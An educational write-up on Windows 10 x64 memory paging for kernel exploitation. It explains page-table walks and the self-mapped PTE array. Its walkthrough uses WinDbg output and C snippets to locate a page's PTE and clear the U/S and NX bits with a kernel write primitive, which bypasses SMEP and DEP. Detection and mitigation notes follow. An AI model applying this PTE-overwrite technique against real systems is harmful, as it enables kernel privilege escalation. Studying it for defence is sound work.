Memory paging fundamentals for kernel exploitation (Win10 x64)

How a 48-bit virtual address is walked through PML4 → PDPT → PD → PT to a physical frame on Windows 10 x64, where the PTE for any address lives, and which PTE control bits (U/S, R/W, NX, P) a kernel write primitive flips to defeat SMEP/NX.

Mechanism

Why it works

x86-64 in long mode uses 4-level paging. Translation starts at the physical address in CR3 (the PML4 base) and walks four 512-entry tables, consuming 9 address bits at each level, then a 12-bit page offset:

Bits     Field                        Table walked
63–48    sign extension (canonical)   (none)
47–39    PML4 index                   PML4
38–30    PDPT index                   PDPT (PDPE)
29–21    PD index                     PD (PDE)
20–12    PT index                     PT (PTE)
11–0     page offset                  4 KB frame

Each table is one 4 KB page of 512 × 8-byte entries (9 index bits select one of 512). Bits 63–48 must copy bit 47 (canonical form): user addresses start 0x0000..., kernel addresses start 0xFFFF.... A Page Frame Number (PFN) stored in an entry is a physical page number, so the physical base of that page is PFN * 0x1000. The final PTE's PFN times 0x1000, plus the 12-bit offset, is the physical address.
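As a minimal sketch of the split described above, the following C helpers extract the four table indices and the page offset from a virtual address, and rebuild a physical address from a PFN. The names va_parts, split_va, and phys_addr are illustrative and do not come from any Windows header.

```c
#include <stdint.h>

/* Illustrative names; not taken from any Windows header. */
typedef struct {
    unsigned pml4; /* bits 47..39 */
    unsigned pdpt; /* bits 38..30 */
    unsigned pd;   /* bits 29..21 */
    unsigned pt;   /* bits 20..12 */
    unsigned off;  /* bits 11..0  */
} va_parts;

/* Split a 48-bit canonical virtual address into its paging fields. */
va_parts split_va(uint64_t va) {
    va_parts p;
    p.pml4 = (unsigned)((va >> 39) & 0x1FF);
    p.pdpt = (unsigned)((va >> 30) & 0x1FF);
    p.pd   = (unsigned)((va >> 21) & 0x1FF);
    p.pt   = (unsigned)((va >> 12) & 0x1FF);
    p.off  = (unsigned)(va & 0xFFF);
    return p;
}

/* Physical address = PFN * 4 KB + offset within the page. */
uint64_t phys_addr(uint64_t pfn, unsigned off) {
    return pfn * 0x1000ULL + off;
}
```

For example, split_va(0x1f0000) gives PML4, PDPT, and PD indices of 0, a PT index of 0x1F0, and an offset of 0; if the final PTE held PFN 0x12345, phys_addr(0x12345, 0) would be 0x12345000.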

The exploitation-relevant trick: because the page tables are themselves pages in physical memory, the OS maps them back into virtual memory through a self-referencing PML4 entry. On Windows 10 x64 the resulting PTE array historically sat at the fixed base 0xFFFFF68000000000; since page-table randomization (a mitigation introduced in Windows 10 version 1607) the base is chosen at boot, for example 0xFFFFFE0000000000. Given that base, the PTE that controls a virtual address VA is found by indexing into the array by VA's page number:

PTE_addr = PTE_BASE + (((VA & 0x0000FFFFFFFFFFFF) >> 12) << 3)
         = PTE_BASE + ((VA >> 9) & 0x7FFFFFFFF8)
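The same indexing can be applied repeatedly: because the PTE array is itself mapped through the self-reference, feeding a PTE's virtual address back into the formula gives the address of the PDE above it, and so on up to the PML4 entry. The sketch below assumes a self-mapped hierarchy and uses hypothetical helper names (selfmap_entry, selfmap_walk); the base passed in is whatever value applies to the current boot.

```c
#include <stdint.h>

/* Hypothetical helper: virtual address of the entry that maps `va`,
 * given the base of the self-mapped PTE array. */
uint64_t selfmap_entry(uint64_t va, uint64_t pte_base) {
    /* (va >> 9) equals page_number * 8; the mask keeps bits 38..3 and
     * discards the canonical sign-extension bits of kernel addresses. */
    return pte_base + ((va >> 9) & 0x7FFFFFFFF8ULL);
}

/* Fill out[0..3] with the PTE, PDE, PDPTE, and PML4E addresses for va. */
void selfmap_walk(uint64_t va, uint64_t pte_base, uint64_t out[4]) {
    uint64_t cur = va;
    for (int i = 0; i < 4; i++) {
        cur = selfmap_entry(cur, pte_base); /* one level up per step */
        out[i] = cur;
    }
}
```

With the illustrative base 0xFFFFFE0000000000 and va = 0x1f0000, this yields 0xFFFFFE0000000F80 (PTE), 0xFFFFFE7F00000000 (PDE), 0xFFFFFE7F3F800000 (PDPTE), and 0xFFFFFE7F3F9FC000 (PML4E). Masking matters for the upper levels, since every input after the first is a kernel address with bits 63–48 set.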

Each PTE carries control bits that the MMU enforces on every access:

  • P (Present, bit 0): entry is valid; cleared ⇒ page fault.
  • R/W (bit 1): writable when set, read-only when clear.
  • U/S (bit 2): User when set, Supervisor (kernel) when clear.
  • A (Accessed, bit 5) / D (Dirty, bit 6): set by the CPU on reference/write.
  • NX (bit 63): No-eXecute when set (DEP / NonPagedPoolNx).

Of these, U/S, R/W, and NX are the bits kernel exploits target. SMEP forbids ring 0 from executing a page whose translation is marked User; SMAP forbids ring-0 data access to such pages. An attacker with a kernel write primitive who can locate the PTE of their user-mode shellcode page can therefore clear U/S (User → Supervisor) and clear NX. Because a page counts as User only if U/S is set at every level of the walk, clearing it in the leaf PTE alone is enough. The page keeps its user-mode address, but the MMU now treats it as a supervisor, executable page, so neither SMEP nor NX faults. This is the core of "PTE overwrite" SMEP/DEP bypasses.
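To make the bit layout concrete, here is a small decoding sketch in C. The macro and function names are illustrative, and ring0_can_execute_leaf looks only at the leaf PTE with SMEP assumed enabled; a real walk also combines the permissions of the upper-level entries.

```c
#include <stdbool.h>
#include <stdint.h>

#define PTE_P        (1ULL << 0)           /* Present */
#define PTE_RW       (1ULL << 1)           /* Writable */
#define PTE_US       (1ULL << 2)           /* User (1) / Supervisor (0) */
#define PTE_NX       (1ULL << 63)          /* No-eXecute */
#define PTE_PFN_MASK 0x000FFFFFFFFFF000ULL /* bits 51..12 */

typedef struct {
    bool present, writable, user, no_execute;
    uint64_t pfn;
} pte_info;

/* Decode the control bits and PFN of a raw 64-bit PTE value. */
pte_info decode_pte(uint64_t pte) {
    pte_info i;
    i.present    = (pte & PTE_P)  != 0;
    i.writable   = (pte & PTE_RW) != 0;
    i.user       = (pte & PTE_US) != 0;
    i.no_execute = (pte & PTE_NX) != 0;
    i.pfn        = (pte & PTE_PFN_MASK) >> 12;
    return i;
}

/* Leaf-only view, SMEP assumed on: ring 0 may fetch code from the page
 * only if it is present, Supervisor, and not NX. */
bool ring0_can_execute_leaf(uint64_t pte) {
    pte_info i = decode_pte(pte);
    return i.present && !i.user && !i.no_execute;
}
```

For a made-up value such as 0x0090000012345867, decode_pte reports a present, writable, User page with NX clear and PFN 0x12345, and ring0_can_execute_leaf returns false because U/S is set.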

Walkthrough

Authorized testing only

Use a Windows 10 x64 VM with a kernel debugger you own. Page-table base and PFNs are randomized per boot; numbers below are illustrative of one session.

1. Attach WinDbg and find a target virtual address. Pick a user-mode page you control (e.g., a VirtualAlloc'd shellcode buffer at VA).

2. Walk the tables with !pte. !pte <VA> prints all four entries and the final frame, with control bits:

kd> !pte 0x1f0000
                VA 00000000001f0000
PXE at FFFFFE7F3F9FC000    PPE at FFFFFE7F3F800000    PDE at FFFFFE7F00000000    PTE at FFFFFE0000000F80
contains ...          contains ...          contains ...          contains 0090000012345867
                                                                   pfn 12345 ---DA--UWEV

The trailing flag string (---DA--UWEV) decodes the bits: D = Dirty, A = Accessed, U = User, W = Writable, E = Executable (NX clear; a dash in that position means NX is set), V = Valid (Present). The address printed after "PTE at" is the kernel virtual address of the 8-byte PTE that governs VA.

3. Convert virtual → physical. Confirm the walk with !vtop, then dump the frame with !dd. Passing 0 as the first argument makes !vtop use the directory base of the current process context; !dd reads the physical address it reports:

kd> !vtop 0 0x1f0000
kd> !dd <physical_base>

4. Compute the PTE address yourself. This is what an exploit does without a debugger — derive the controlling PTE from the randomized base:

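// PTE_BASE leaked/known for this boot (randomized on Win10).
unsigned long long pte_of(unsigned long long va, unsigned long long pte_base) {
    // (va >> 9) is the page number * 8 bytes/PTE; the mask keeps bits 38..3
    // and drops the sign-extension bits, so kernel VAs index correctly too.
    return pte_base + ((va >> 9) & 0x7FFFFFFFF8ULL);
}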

5. Flip the bits with a write primitive. Read the current PTE, clear U/S (make it Supervisor) and clear NX (make it executable), write it back:

// kread64/kwrite64 stand for the attacker's kernel read/write primitive.
unsigned long long pte_va = pte_of(va, pte_base);
unsigned long long pte = kread64(pte_va);
pte &= ~(1ULL << 2);    // U/S: User(1) -> Supervisor(0), so SMEP/SMAP see a kernel page
pte &= ~(1ULL << 63);   // NX -> 0, so the page becomes executable (defeats DEP/NX)
pte |=  (1ULL << 1);    // R/W set, if a writable shellcode page is desired
kwrite64(pte_va, pte);
// The old translation may still be cached in the TLB; the new bits apply once
// that entry is invalidated (e.g., INVLPG or a CR3 reload on a context switch).

The user-address shellcode at va is now a kernel-executable page; redirecting kernel control flow to va no longer faults under SMEP/DEP.
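The bit arithmetic of step 5 can be checked offline on a plain integer, without touching any page table. A small sketch, using a hypothetical helper name (to_supervisor_exec) and a made-up PTE value:

```c
#include <stdint.h>

/* Hypothetical helper: apply the U/S and NX changes from step 5 to a
 * raw PTE value and return the result. No memory is read or written. */
uint64_t to_supervisor_exec(uint64_t pte) {
    pte &= ~(1ULL << 2);   /* clear U/S: User -> Supervisor */
    pte &= ~(1ULL << 63);  /* clear NX: page becomes executable */
    return pte;
}
```

Applied to 0x8090000012345867 (User, NX set), the result is 0x0090000012345863: only bits 2 and 63 change, while the PFN and the remaining flags are untouched.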

Detection

  • PatchGuard does not monitor arbitrary user PTEs, so a single U/S flip is largely invisible at runtime; detection is easier at the primitive level (an exploitable kernel write).
  • On hardened systems, HVCI and Kernel CFG raise the bar, so a single PTE flip is no longer sufficient on its own.
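One consistency check that a tool with read access to the page tables could apply is sketched below. It is an assumption made for illustration, not a description of any shipping product, and it presumes that ordinary user-half mappings always carry U/S = 1; the function name is hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

/* Heuristic only: flag a present leaf PTE that maps a user-half address
 * (bits 63..47 all zero) yet is marked Supervisor. */
bool looks_like_us_flip(uint64_t va, uint64_t pte) {
    bool user_half = (va >> 47) == 0;
    bool present   = (pte & 1ULL) != 0;
    bool user_bit  = (pte & (1ULL << 2)) != 0;
    return user_half && present && !user_bit;
}
```

The check returns true for a user-half address whose PTE has U/S cleared, and false for kernel-half addresses or non-present entries. Such a scan only sees the state at the moment it runs, so it would miss a flip that is made and reverted between scans.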

Mitigation

  • SMEP / SMAP (hardware): make User (U/S = 1) pages unusable from ring 0. Flipping that bit in the PTE is exactly how an attacker sidesteps them, so defense in depth must deny the attacker a kernel write primitive in the first place.
  • Page-table randomization (Win10): randomizes PTE_BASE, so the attacker must first leak it before computing PTE addresses.
  • HVCI (Hypervisor-protected Code Integrity): uses second-level address translation (EPT on Intel) so the guest cannot make an arbitrary page kernel-executable even after flipping a guest PTE.
  • Keep NonPagedPoolNx / DEP enforced so kernel data pages are non-executable by default.

References